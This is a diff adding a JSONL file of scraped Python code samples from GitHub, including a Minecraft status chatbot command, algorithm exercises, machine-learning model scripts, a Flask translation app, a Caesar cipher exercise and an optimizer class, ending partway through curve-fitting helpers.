diff --git "a/4804.jsonl" "b/4804.jsonl" new file mode 100644--- /dev/null +++ "b/4804.jsonl" @@ -0,0 +1,1693 @@ +{"seq_id":"74175663615","text":"from ..command import Command\nfrom ..eventpackage import EventPackage\nimport requests\nimport json\n\n# note: this command only works when run on a machine in same subnet as dot.\n# (this command will work when run on dot.)\n\nclass MCOnlineCommand(Command):\n def __init__(self):\n super().__init__()\n self.name = \"$MCOnline\"\n self.help = \"$MCOnline | Tells who is online on the minecraft server\"\n self.author = \"presto\"\n self.last_updated = \"October 4th 2019\"\n\n def run(self, event_pack: EventPackage):\n r = requests.get(\"https://api.mcsrvstat.us/2/dot.cs.wmich.edu:6969\")\n status = json.loads(r.content.decode(\"utf-8\"))\n \n playerList = \"\"\n if status[\"players\"][\"online\"] > 0:\n playerList = \"Players Online: \"\n plural = False\n for player in status[\"players\"][\"list\"]:\n if plural:\n playerList = playerList + \", \"\n playerList = playerList + player\n plural = True\n\n else:\n playerList = \"No one is online :(\"\n \n\n return playerList\n","repo_name":"ccowmu/ccawmunity","sub_path":"chatbot/commandcenter/commands/MCOnline.py","file_name":"MCOnline.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"17117956945","text":"n, k = map(int, input().split())\nN = list(map(int, input().split()))\nK = list(map(int, input().split()))\n\nresult = []\n\ndef bs(x, arr):\n bad = -1\n good = len(arr)\n while good - bad > 1:\n m = (bad + good) // 2\n if arr[m] >= x:\n good = m\n else:\n bad = m\n\n return good\n\nfor ke in K:\n index = bs(ke, N)\n\n l = -100000000000 if index - 1 < 0 else N[index - 1]\n r = 100000000000 if index > k -1 else N[index]\n dl = abs(ke - l)\n dr = abs(ke - r)\n\n value = 0\n if dl == dr:\n value = min(l, r)\n else:\n value = r if dl > dr else l\n\n result.append(str(value))\n\nprint('\\n'.join(result))\n","repo_name":"tarasneroznak/algoritmika","sub_path":"hw2/yandex/approximateBinarySearch.py","file_name":"approximateBinarySearch.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"494259976","text":"import sys\r\nimport torch\r\nfrom matplotlib import pyplot as plt\r\nfrom matplotlib.cm import Paired\r\nfrom torch.utils.data import DataLoader\r\nfrom AccessCorrectFolders import abbreviate_embed_names\r\nfrom Initiate_PSiteDataset import PSiteDataset, re_init_dataset, balance_dataset\r\nfrom PSite_Models import PSitePredictV4\r\nfrom Model_analysis_functions import test_model, average_output_tuples, calculate_performance_metrics\r\n\r\n'''\r\nCompares the performance of saved PSitePredict prediction models trained on differently-derived embeddings\r\n(OneHot, ESM, CARP, AlphaFold) by testing on the same dataset and graphing the ROC and PRC Areas Under the Curve.\r\n\r\nRun this script from the command line by giving the additional argument 'ST' or 'Y' to select which P-sites to test.\r\n'''\r\n\r\nprint(\"Loading in Necessary data...\")\r\ndata_dir = \"/data/home/arendvc/\"\r\n\r\n# Choose the embeddings for which the models will be tested and select the correct source directories of the test data:\r\nembeddings = ['onehot', 'esm', 'carp', 'alphafold-t', 'alphafold-nt']\r\nembeddings = embeddings + list(map(lambda x: x + '+DSSP', embeddings))\r\n\r\ntitle_embs = list(map(abbreviate_embed_names, embeddings))\r\ntitle_order = [0, 5, 1, 6, 2, 7, 3, 8, 4, 9]\r\ntitle_embs = [title_embs[i] for i in title_order]\r\n\r\nembed_dirs = [data_dir + embed.replace('-nt', '').replace('-t', '') + '_outputs/' for embed in embeddings]\r\nembed_dirs = [embed_dirs[i] for i in title_order]\r\n\r\ntest_dirs = ['None'] * len(embed_dirs)\r\nfor n, edir in enumerate(embed_dirs):\r\n if n in [6, 7]:\r\n test_dirs[n] = edir + 'test_Templated/'\r\n elif n in [8, 9]:\r\n test_dirs[n] = edir + 'test_NoTemp/'\r\n else:\r\n test_dirs[n] = edir + 'Ram22_test_windowed/'\r\n\r\npsite = sys.argv[1]\r\ntest_file = \"/home/arendvc/PSite_Files/Ram22_pep_filtered_\" + psite + \"_test.fasta\"\r\n\r\n\r\nprint(\"Creating Test Datasets...\")\r\ntest_dls = []\r\nfor m, tdir in enumerate(test_dirs):\r\n ds = PSiteDataset(data_rep_dir=tdir, labels_fasta=test_file, field_radius=30)\r\n ds = re_init_dataset(ds)\r\n # bal_ds = balance_dataset(ds)\r\n\r\n channel_nr = len(ds[0][0])\r\n\r\n replicates = []\r\n for bs in range(64, 193, 32):\r\n dl = DataLoader(dataset=ds, batch_size=bs, shuffle=True)\r\n replicates.append(dl)\r\n\r\n test_dls.append((replicates, channel_nr))\r\n\r\n# Load in the saved models and run each model on the respective test data\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n# Fill in the appropriate models\r\nprint(\"Loading in Saved Models...\")\r\nmodel_paths = []\r\nfor embed_type, embed_dir in zip(title_embs, embed_dirs):\r\n model_paths.append(embed_dir + f'ModelV4_{psite}_CH40_rad30_{embed_type}_Cl2.pth')\r\n\r\n\r\noutputs = []\r\nfor n, (test_dl, num_features) in enumerate(test_dls):\r\n model = PSitePredictV4(input_shape=num_features,\r\n hidden_units=40,\r\n output_shape=2,\r\n field_length=61,\r\n kernel=3,\r\n pad_idx=1,\r\n dropout=0.3)\r\n\r\n loaded_state_dict = torch.load(model_paths[n])\r\n model.load_state_dict(loaded_state_dict)\r\n model = model.to(device)\r\n\r\n print(f\"Testing model {n + 1}...\")\r\n\r\n model_reps = []\r\n for rep in test_dl:\r\n preds = test_model(model, rep, device)\r\n model_reps.append(calculate_performance_metrics(*preds))\r\n model_avg = average_output_tuples(model_reps)\r\n\r\n outputs.append(model_avg)\r\n\r\n\r\n# Changes to make the graph nicer\r\ntitle_label = 'Ser/Thr' if psite == 'ST' else 'Tyr'\r\ncols = list(Paired.colors)\r\n\r\n# Plot the outcomes of the different models in a comparative graph\r\nplt.figure(figsize=(18, 8))\r\n\r\n# Plot ROC curve\r\nprint(\"Generating Plots...\")\r\nplt.subplot(1, 2, 1)\r\nfor m, output in enumerate(outputs):\r\n plt.plot(output[3], output[4], label=f'{title_embs[m]} ({output[0]:.3f})', color=cols[m])\r\nplt.plot([0, 1], [0, 1], 'k--')\r\nplt.xlim([0.0, 1.0])\r\nplt.ylim([0.0, 1.05])\r\nplt.xlabel('False Positive Rate')\r\nplt.ylabel('True Positive Rate')\r\nplt.title('Receiver operating characteristic')\r\nplt.legend(loc=\"lower right\", title=\"Encoder (AUC)\")\r\n\r\n# Plot Precision-Recall curve\r\nplt.subplot(1, 2, 2)\r\nfor m, output in enumerate(outputs):\r\n plt.plot(output[5], output[6], label=f'{output[1]:.3f} ({output[2]:.3f})', color=cols[m])\r\n\r\n # Also prints the mean accuracy scores for each model\r\n print(title_embs[m], f\"Total mean average: {output[7]*100:.2f}\")\r\nplt.xlim([0.0, 1.0])\r\nplt.ylim([0.0, 1.05])\r\nplt.xlabel('Recall')\r\nplt.ylabel('Precision')\r\nplt.title(f'Precision-Recall curve')\r\nplt.legend(loc=\"lower left\", title=\"AUC (F1-score)\")\r\n\r\nplt.suptitle(f\"PSitePredict Performance Comparison - {title_label}\")\r\nplt.savefig(data_dir + f'Model4_AUC_Comparison_CH40_R30_{psite}_5runs.png')\r\n","repo_name":"ArendVCN/MT_2223","sub_path":"scripts/Model_Comparison.py","file_name":"Model_Comparison.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14450224934","text":"from flask import Flask, render_template, request, url_for, jsonify\nimport torch\nfrom transformers import T5Tokenizer, T5ForConditionalGeneration\nfrom flask_cors import CORS\n\nDEBUG = True\napp = Flask(__name__)\n# https://stackoverflow.com/questions/37575089/disable-template-cache-jinja2\n#app.config['TEMPLATES_AUTO_RELOAD'] = True\napp.config.from_object(__name__)\n\nCORS(app, resources={r'/*': {'origins': '*'}})\n\nmodel = T5ForConditionalGeneration.from_pretrained(\"t5-base\")\ntokenizer = T5Tokenizer.from_pretrained(\"t5-base\")\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n@app.route('/result', methods=['GET'])\ndef result():\n english = request.args.get('english')\n german = request.args.get('german')\n\n #encode english input with prefix\n input_ids = tokenizer.encode(\"translate English to German: \" + english, return_tensors=\"pt\")\n #encode user's german translation\n output_ids = tokenizer.encode(german, return_tensors='pt')\n\n #generate and decode machine translation of english input\n outputs1 = model.generate(input_ids, max_length=40, num_beams=4, early_stopping=True)\n machine_translation = [tokenizer.decode(g, skip_special_tokens=True, clean_up_tokenization_spaces=False) for g in outputs1]\n\n #I don't really understand this part to be honest, but it has to do with generating predictions\n outputs = model(input_ids=input_ids, lm_labels=output_ids)\n loss, prediction_scores = outputs[:2]\n\n all_predictions = []\n next_pos = 0\n colors = []\n decoded_tokens = []\n\n #loop through encoded lists of predictions\n for tok in prediction_scores[0]:\n\n #list of top 10 predictions for each token\n predicted_tokens = tok.topk(10).indices\n\n #current input token\n next_token = output_ids[0, next_pos]\n\n #decode current token and add to list\n decoded_token = tokenizer.convert_ids_to_tokens(next_token.item()).replace('\\u2581', '\\u00a0')\n decoded_tokens.append(decoded_token)\n\n encoded_predictions = []\n decoded_predictions = []\n\n #loop through each prediction for the current token\n for index in predicted_tokens:\n #convert ids to tokens to maintain word breaks; convert word break character to a space\n decoded_predictions.append(tokenizer.convert_ids_to_tokens(index.item()).replace('\\u2581', '\\u00a0'))\n encoded_predictions.append(index.item())\n\n #determine highlight color for each prediction\n if next_token in predicted_tokens:\n listpos = encoded_predictions.index(next_token) \n if listpos == 0:\n colors.append(\"lime\")\n else:\n colors.append(\"yellow\")\n else:\n colors.append(\"red\")\n\n #list of lists each containing top 10 predictions\n all_predictions.append(decoded_predictions[0:10])\n next_pos += 1\n return jsonify({\n \"translation\": machine_translation[0],\n \"predictions\": all_predictions,\n \"colors\": colors,\n \"decoded_tokens\": decoded_tokens\n })\n\n@app.route('/wholesentence', methods=['GET'])\ndef wholesentence():\n english = request.args.get('english')\n german = request.args.get('german')\n\n first_token = tokenizer.encode(german, return_tensors=\"pt\")[0][0].item()\n\n input_ids = tokenizer.encode(\"translate English to German: \" + english, return_tensors=\"pt\")\n english_encoded = model.encoder(input_ids = input_ids)\n\n outputs1 = model.generate(input_ids, max_length=40, num_beams=4, early_stopping=True)\n machine_translation = [tokenizer.decode(g, skip_special_tokens=True, clean_up_tokenization_spaces=False) for g in outputs1]\n\n output_ids = tokenizer.encode(german, return_tensors='pt')\n partial_decode = torch.LongTensor([0, first_token])\n\n next_token_to_add = torch.tensor(1)\n \n while next_token_to_add.item() != 5:\n next_word_logits = model.forward(\n encoder_outputs=english_encoded, \n decoder_input_ids=partial_decode.unsqueeze(0)\n )[0]\n \n next_token_to_add = next_word_logits[0, -1].topk(5).indices[0]\n partial_decode = torch.cat((partial_decode, next_token_to_add.unsqueeze(0)), 0)\n\n final = tokenizer.decode(partial_decode)\n\n return jsonify({\"translation\": final,\n \"expected\" : machine_translation[0]\n })\n\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"adomaatobrah/simplewebpage","sub_path":"April/translation/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13476635854","text":"\"\"\"\nEncryption component\nv1 - set up encryption\n\"\"\"\n\n# set up variables\nuser_message = \"I have three Cats, two dogs, and a rabbit.\"\nshift = 9\n\n\n# result placeholder\nresult = \"\"\n\n# go through each letter of the message\nfor letter in user_message:\n # convert letters into the ASCII code\n Ascii_code = ord(letter)\n # Add shift to the ASCII code\n new_Ascii_code = Ascii_code + shift\n # revert the integer back into a string to get encrypted message\n new_letter = chr(new_Ascii_code)\n # append message into the empty string\n result = result + new_letter\n\nprint(result)\n","repo_name":"chizzywizzy833/CKCaesarCipher","sub_path":"03_encrypt_v1.py","file_name":"03_encrypt_v1.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"40881051202","text":"\"\"\"Water Evaporation Optimization.\n\"\"\"\n\nimport copy\nfrom typing import Any, Dict, Optional\n\nimport numpy as np\n\nimport opytimizer.math.random as r\nimport opytimizer.utils.constant as c\nimport opytimizer.utils.exception as e\nfrom opytimizer.core import Optimizer\nfrom opytimizer.core.function import Function\nfrom opytimizer.core.space import Space\nfrom opytimizer.utils import logging\n\nlogger = logging.get_logger(__name__)\n\n\nclass WEO(Optimizer):\n \"\"\"A WEO class, inherited from Optimizer.\n\n This is the designed class to define WEO-related\n variables and methods.\n\n References:\n A. Kaveh and T. Bakhshpoori.\n Water Evaporation Optimization: A novel physically inspired optimization algorithm.\n Computers & Structures (2016).\n\n \"\"\"\n\n def __init__(self, params: Optional[Dict[str, Any]] = None) -> None:\n \"\"\"Initialization method.\n\n Args:\n params: Contains key-value parameters to the meta-heuristics.\n\n \"\"\"\n\n logger.info(\"Overriding class: Optimizer -> WEO.\")\n\n super(WEO, self).__init__()\n\n self.E_min = -3.5\n self.E_max = -0.5\n\n self.theta_min = -np.pi / 3.6\n self.theta_max = -np.pi / 9\n\n self.build(params)\n\n logger.info(\"Class overrided.\")\n\n @property\n def E_min(self) -> float:\n \"\"\"Minimum substrate energy.\"\"\"\n\n return self._E_min\n\n @E_min.setter\n def E_min(self, E_min: float) -> None:\n if not isinstance(E_min, (float, int)):\n raise e.TypeError(\"`E_min` should be a float or integer\")\n\n self._E_min = E_min\n\n @property\n def E_max(self) -> float:\n \"\"\"Maximum substrate energy.\"\"\"\n\n return self._E_max\n\n @E_max.setter\n def E_max(self, E_max: float) -> None:\n if not isinstance(E_max, (float, int)):\n raise e.TypeError(\"`E_max` should be a float or integer\")\n if E_max < self.E_min:\n raise e.ValueError(\"`E_max` should be >= `E_min`\")\n\n self._E_max = E_max\n\n @property\n def theta_min(self) -> float:\n \"\"\"Minimum contact angle.\"\"\"\n\n return self._theta_min\n\n @theta_min.setter\n def theta_min(self, theta_min: float) -> None:\n if not isinstance(theta_min, (float, int)):\n raise e.TypeError(\"`theta_min` should be a float or integer\")\n\n self._theta_min = theta_min\n\n @property\n def theta_max(self) -> float:\n \"\"\"Maximum contact angle.\"\"\"\n\n return self._theta_max\n\n @theta_max.setter\n def theta_max(self, theta_max: float) -> None:\n if not isinstance(theta_max, (float, int)):\n raise e.TypeError(\"`theta_max` should be a float or integer\")\n if theta_max < self.theta_min:\n raise e.ValueError(\"`theta_max` should be >= `theta_min`\")\n\n self._theta_max = theta_max\n\n def _evaporation_flux(self, theta: float) -> float:\n \"\"\"Calculates the evaporation flux (eq. 7).\n\n Args:\n theta: Radian-based angle.\n\n Returns:\n (float): Evaporation flux.\n\n \"\"\"\n\n # Calculates the evaporation flux (eq. 7)\n J = (\n (1 / 2.6)\n * ((2 / 3 + np.cos(theta) ** 3 / 3 - np.cos(theta)) ** (-2 / 3))\n * (1 - np.cos(theta))\n )\n\n return J\n\n def update(\n self, space: Space, function: Function, iteration: int, n_iterations: int\n ) -> None:\n \"\"\"Wraps Water Evaporation Optimization over all agents and variables.\n\n Args:\n space: Space containing agents and update-related information.\n function: A Function object that will be used as the objective function.\n iteration: Current iteration.\n n_iterations: Maximum number of iterations.\n\n \"\"\"\n\n space.agents.sort(key=lambda x: x.fit)\n best, worst = space.agents[0], space.agents[-1]\n\n for agent in space.agents:\n a = copy.deepcopy(agent)\n\n if int(iteration <= n_iterations / 2):\n # Calculates the substrate energy (eq. 5)\n E_sub = ((self.E_max - self.E_min) * (a.fit - best.fit)) / (\n worst.fit - best.fit + c.EPSILON\n ) + self.E_min\n\n # Calculates the Monolayer Evaporation Probability matrix (eq. 6)\n r1 = r.generate_uniform_random_number(\n size=(agent.n_variables, agent.n_dimensions)\n )\n MEP = np.where(r1 < np.exp(E_sub), 1, 0)\n\n # Generates the step size (eq. 10)\n r2 = r.generate_uniform_random_number()\n i = r.generate_integer_random_number(0, space.n_agents)\n j = r.generate_integer_random_number(0, space.n_agents, i)\n S = r2 * (space.agents[i].position - space.agents[j].position)\n\n # Updates the agent's position (eq. 11)\n a.position += S * MEP\n else:\n # Calculates the contact angle (eq. 8)\n theta = ((self.theta_max - self.theta_min) * (a.fit - best.fit)) / (\n worst.fit - best.fit + c.EPSILON\n ) + self.theta_min\n\n # Calculates the Droplet Evaporation Probability matrix (eq. 9)\n r1 = r.generate_uniform_random_number(\n size=(a.n_variables, a.n_dimensions)\n )\n DEP = np.where(r1 < self._evaporation_flux(theta), 1, 0)\n\n # Generates the step size (eq. 10)\n r2 = r.generate_uniform_random_number()\n i = r.generate_integer_random_number(0, space.n_agents)\n j = r.generate_integer_random_number(0, space.n_agents, i)\n S = r2 * (space.agents[i].position - space.agents[j].position)\n\n # Updates the agent's position (eq. 11)\n a.position += S * DEP\n a.clip_by_bound()\n\n a.fit = function(a.position)\n if a.fit < agent.fit:\n agent.position = copy.deepcopy(a.position)\n agent.fit = copy.deepcopy(a.fit)\n","repo_name":"gugarosa/opytimizer","sub_path":"opytimizer/optimizers/science/weo.py","file_name":"weo.py","file_ext":"py","file_size_in_byte":6097,"program_lang":"python","lang":"en","doc_type":"code","stars":580,"dataset":"github-code","pt":"79"} +{"seq_id":"25668458201","text":"\"\"\"\nInput: A k-sorted array - array where an element is at most k distance away from it's actual sorted place\nOutput: The actual sorted array\nLogic:\nSince the array is k-sorted, reading k positions ensures that the smallest element in the k elements is the min element\nUse a min heap to read in k elements and extract the min. Repeat until the array is exhausted.\n\"\"\"\nimport heapq\nimport itertools\nimport collections\nfrom typing import List\n# from collections import Iterator\n\n\nclass Solution:\n def sort_k_sorted_array(self, input_array: List[int], k: int) -> List[int]:\n # define the min heap\n min_heap : List[int] = []\n\n # add first k elements to the heap\n for i in itertools.islice(input_array, k):\n heapq.heappush(min_heap, i)\n\n result = []\n # now iterate through the rest of the array. For every new element added, extract min and add to the result set\n for i in input_array[k:]:\n minimum = heapq.heappushpop(min_heap, i)\n result.append(minimum)\n\n # we have k elements left in the heap. Extract them and append to the result\n while min_heap:\n result.append(heapq.heappop(min_heap))\n\n return result\n\n\ns = Solution()\nprint(s.sort_k_sorted_array([3, -1, 2, 6, 45, 8], 2))\nprint(s.sort_k_sorted_array([3], 2))\nprint(s.sort_k_sorted_array([3, -1], 2))\n","repo_name":"adykumar/DangerWager","sub_path":"Indy/019-10.3-EPI-SortKSortedArray.py","file_name":"019-10.3-EPI-SortKSortedArray.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"33744806763","text":"import torch\nfrom torch.autograd import Variable\n\ndef scalar_grad():\n x = Variable(torch.ones(1)*3, requires_grad=True) # 3\n y = Variable(torch.ones(1)*4, requires_grad=True) # 4\n z = x.pow(2) + 3*y.pow(2)\n\n z.backward()\n\n # dz/dx = 2x\n # dz/dy = 6y\n\n print(x.grad)\n print(y.grad)\n\ndef vector_grad():\n x = Variable(torch.ones(2)*3, requires_grad=True)\n y = Variable(torch.ones(2)*4, requires_grad=True)\n z = x.pow(2) + 3*y.pow(2)\n z.backward(torch.ones(2))\n print(x.grad)\n print(y.grad)\n\ndef grad():\n W = Variable(torch.FloatTensor([[1, 1, 1], [2, 2, 2]]), requires_grad=True)\n x = Variable(torch.FloatTensor([1, 2, 3]), requires_grad=False)\n B = Variable(torch.FloatTensor([2, 2]), requires_grad=True)\n\n u = Variable(torch.FloatTensor([0, 0, 0]), requires_grad=False)\n\n y = W.mv(x-u) + B.pow(2)\n z = W.mv(x - u) + B.pow(2)\n\n # y.backward(torch.ones(1)) #\n #\n # print(W.grad)\n # print(B.grad)\n #\n # W.grad.data.zero_()\n # B.grad.data.zero_()\n #\n # z.backward(torch.ones(1))\n #\n # print(W.grad)\n # print(B.grad)\n\n r = y + z\n r.backward(torch.ones(1))\n print(W.grad)\n print(B.grad)\n\ndef grad2():\n W = Variable(torch.rand(2, 2), requires_grad=True)\n W2 = Variable(torch.rand(2, 1), requires_grad=True)\n x1 = Variable(torch.rand(1, 2), requires_grad=True)\n x2 = Variable(torch.rand(1, 2), requires_grad=True)\n\n print(\"w: \")\n print(W)\n print(\"x1: \")\n print(x1)\n print(\"x2: \")\n print(x2)\n print(\"--------------------\")\n\n y1 = torch.matmul(torch.matmul(x1, W), W2)\n print(torch.matmul(W, W2))\n # y = Variable(y, requires_grad=True)\n # print(\"y1:\")\n # print(y1)\n\n y1.backward()\n # print(W.grad)\n print(x1.grad)\n\n # W.grad.data.zero_()\n # x1.grad.data.zero_()\n y2 = torch.matmul(torch.matmul(x2, W), W2)\n y2.backward()\n # print(\"y2: \")\n # print(y2)\n # print(W.grad)\n print(x2.grad)\n\ndef test_dimension():\n batch_size = 3\n dim = 2\n x = torch.rand(batch_size, dim)\n u = torch.zeros(dim)\n W = torch.rand(dim, dim)\n\n x = Variable(x, requires_grad=True)\n u = Variable(u, requires_grad=True)\n W = Variable(W, requires_grad=True)\n print(x)\n print(u)\n print(W)\n\n temp = x - u\n y = torch.matmul(torch.matmul(temp, W), torch.sum(temp.t(), dim=1, keepdim=True))\n y.backward(torch.ones(batch_size, dim))\n print('--------')\n # print(y)\n print(x.grad)\n print(torch.matmul(x, W))\n\nif __name__ == '__main__':\n test_dimension()","repo_name":"gonglixue/PRML_Python","sub_path":"PytorchTutorials_ubuntu/gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18435774498","text":"#!/usr/bin/python3\n\"\"\"Return top ten posts from subreddit\"\"\"\n\nimport requests\n\n\ndef top_ten(subreddit):\n \"\"\"Return top ten posts from subreddit\"\"\"\n\n url = \"https://www.reddit.com/r/{}/hot.json\".format(subreddit)\n headers = {\"User-Agent\": \"Mozilla/5.0\"}\n params = {\"limit\": 10}\n response = requests.get(url, headers=headers, params=params)\n if response.status_code != 200:\n print(\"None\")\n return\n data = response.json()\n for post in data[\"data\"][\"children\"]:\n print(post[\"data\"][\"title\"])\n","repo_name":"blacky-yg/alx-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"17389991362","text":"num = []\nwhile True:\n n = int(input('Digite um valor: '))\n if n not in num:\n num.append(n)\n print('Valor adicionado com sucesso!')\n else:\n print('Esse valor já existe. Tente um outro diferente!')\n r = ' '\n while r not in 'SN':\n r = str(input('Quer continuar? [S/N]: ')).strip().upper()[0]\n if r == 'N':\n break\nprint('-='*30)\nnum.sort()\nprint(f'Você digitou os valores {num}')\n","repo_name":"fabiomacdo/curso-python","sub_path":"mundo3/ex079.py","file_name":"ex079.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"4655396930","text":"import keras\r\nimport sys\r\nimport cv2\r\nimport numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\n\r\n# импорт MNIST dataset\r\nfrom keras.datasets import mnist\r\nfrom PIL import ImageTk, Image\r\nfrom tkinter import *\r\nfrom tkinter.filedialog import *\r\nfrom tkinter import scrolledtext\r\n\r\n\r\n\r\n\r\n#Загрузка готовых весов\r\nmodel.load_weights('mnist_weights_epoch10.h5')\r\ndef clicked():\r\n op = askopenfilename() \r\n # Проверка изображения\r\n if (len(sys.argv) == 1):\r\n img = cv2.imread(op)\r\n if (not img.data):\r\n print(\"Could not load image\")\r\n exit\r\n\r\n # предварительная обработка\r\n # Меняем цветовое пространство на RGB\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n # меняем размер\r\n img = cv2.resize(img, (28, 28), interpolation = cv2.INTER_AREA)\r\n # конвертирование в числа\r\n img = cv2.bitwise_not(img)\r\n img = img.reshape(1,28,28,1)\r\n img = img.astype('float32')\r\n img /= 255 \r\n\r\n # Предсказание рукописной цифры во входном изображении\r\n score = model.predict(img, batch_size=1, verbose=0)\r\n\r\n \r\n # Показ результатов \r\n \r\n txt.insert(INSERT, \"\\nШансы для всех возможных результатов: \")\r\n sort = sorted(range(len(score[0])), key=lambda k:score[0][k],reverse=True)\r\n for index in sort:\r\n txt.insert(INSERT, \"\\n\" + str(index) + \" : \" + str(score[0][index]))\r\n percent = format(score[0][sort[0]] * 100, '.2f')\r\n txt.insert(INSERT, \"\\nЯ думаю, что на \" + str(percent) + \"% это \" + str(sort[0]))\r\n \r\n \r\nwindow = Tk()\r\nwindow.geometry('470x600')\r\nwindow.title(\"Распознавание рукописных цифр \")\r\ntxt = scrolledtext.ScrolledText(window, width=40, height=35) \r\ntxt.grid(column=0, row=0) \r\nbtn = Button(window, text=\"Открыть\", command=clicked,background=\"#555\",foreground=\"#ccc\",padx=\"20\",pady=\"8\",font=\"16\") \r\nbtn.grid(column=1, row=0)\r\nwindow.mainloop() \r\n","repo_name":"Turchick/-NN","sub_path":"mnist_test.py","file_name":"mnist_test.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18951759704","text":"import numpy as np\r\nfrom numpy import array\r\nimport scipy.odr as odr\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport sympy as sp\r\nfrom scipy import stats\r\n\r\ndef line(t,b0,b1,b2,b3):\r\n x = b0 + b2*t\r\n y = b1 + b3*t\r\n return x,y\r\ndef line_ini(x,y):\r\n d=2;K=1\r\n X_nd = np.hstack((x[:,None],y[:,None]))\r\n bparm = np.zeros(d+K*d)\r\n Xbari = np.mean(X_nd,axis=0)#1-by-d\r\n bparm[:d]=Xbari\r\n Bi = X_nd-Xbari\r\n BBi = np.dot(Bi.T,Bi)\r\n D,V = np.linalg.eig(BBi)\r\n ind = np.argsort(D)#sort from small to big\r\n for k in np.arange(K):\r\n v = V[:,ind[-k-1]]# the biggest eigenvector\r\n v = v[...,None]\r\n bparm[d+k*d:d+(k+1)*d]=v.flatten()*np.sign(v[0])\r\n return bparm\r\n\r\ndef quadratic(t,b0,b1,b2,b3):\r\n \"\"\"\r\n len_b = 4\r\n \r\n input: \r\n t: \r\n b \r\n b0,b1: origin\r\n b2: parameter for quodratic term, b[2]>0\r\n b3: rotation angle (e.g. pi/2, pi,...)\r\n \"\"\"\r\n xx = t\r\n yy = b2*t**2\r\n \r\n s = sp.sin(b3)\r\n c = sp.cos(b3)\r\n x = xx*c-yy*s+b0\r\n y = xx*s+yy*c+b1\r\n return x,y\r\n \r\ndef quadratic_ini(x,y,w=None):\r\n if w is None:\r\n sw=1\r\n else:\r\n sw = np.sqrt(w)\r\n x = x.astype('float64')\r\n y = y.astype('float64')\r\n n_rot = 32\r\n rot = np.array([2*i*np.pi/n_rot for i in range(n_rot)]) \r\n X_dn = np.vstack((x,y))\r\n n = x.shape[0]\r\n res = np.zeros((n_rot,))\r\n coef= np.zeros((n_rot,3))\r\n for i in range(n_rot):\r\n Xr_dn = rotation(X_dn,rot[i])\r\n xx = Xr_dn[0,:]\r\n yy = sw*Xr_dn[1,:]\r\n A = sw*np.array([np.ones((n,)),xx,xx**2])\r\n beta, residual,rank,s = np.linalg.lstsq(A.T,yy)\r\n coef[i,:]=beta\r\n try:\r\n tmp = residual[0]\r\n except:\r\n tmp=np.max(res)\r\n res[i] = tmp\r\n \r\n ind = np.argmin(res)\r\n c = coef[ind,:]\r\n if c[2]<1e-2:\r\n c[2]=1e-2\r\n b0r = -c[1]/2/c[2]\r\n b1r = c[0]-c[1]**2/4/c[2]\r\n \r\n b2 =c[2]\r\n b3 = -rot[ind] \r\n center=rotation(np.array([[b0r],[b1r]]),b3).flatten()\r\n b0=center[0]\r\n b1=center[1]\r\n B0 = np.array([b0,b1,b2,b3])\r\n return B0\r\n\r\ndef quadratic_stdfy(bparm):\r\n # bparm is of size(n,4)\r\n bstdfy = bparm.copy()\r\n b2 = bparm[:,2]\r\n b3 = bparm[:,3]\r\n bstdfy[:,2]=np.abs(b2)\r\n bstdfy[:,3]=np.mod(b3+np.pi*(b2<0),2*np.pi)\r\n return bstdfy\r\n\r\ndef quadratic3D(t,x0,y0,z0,a,b,c,beta):\r\n \"\"\"\r\n len_b = 7\r\n \"\"\"\r\n xx = t\r\n# yy = 0\r\n zz = beta*t**2\r\n sa = sp.sin(a)\r\n ca = sp.cos(a)\r\n sb = sp.sin(b)\r\n cb = sp.cos(b)\r\n sc = sp.sin(c)\r\n cc = sp.cos(c)\r\n x = cb*cc*xx + (sa*sc-ca*sb*cc)*zz+x0\r\n y = -cb*sc*xx + (sa*cc+ca*sb*sc)*zz+y0\r\n z = sb*xx+ca*cb*zz+z0\r\n return x,y,z\r\n\r\ndef quadratic3D_ini(x,y,z,w=None):\r\n if w is None:\r\n sw=1\r\n else:\r\n sw = np.sqrt(w)\r\n x = x.astype('float64')\r\n y = y.astype('float64')\r\n n_th = 4\r\n rot = np.array([i*np.pi/n_th for i in range(n_th)]) \r\n n_rot = n_th**3\r\n X_dn = np.vstack((x,y,z))\r\n n = x.shape[0]\r\n res = np.zeros((n_rot,))\r\n coef= np.zeros((n_rot,3))\r\n rotijk = np.zeros((n_rot,3))\r\n count=0\r\n for i in range(n_th):\r\n for j in range(n_th):\r\n for k in range(n_th):\r\n Xr_dn = rotation_3D(X_dn,rot[i],rot[j],rot[k])\r\n xx = Xr_dn[0,:]\r\n zz = sw*Xr_dn[1,:]\r\n A = 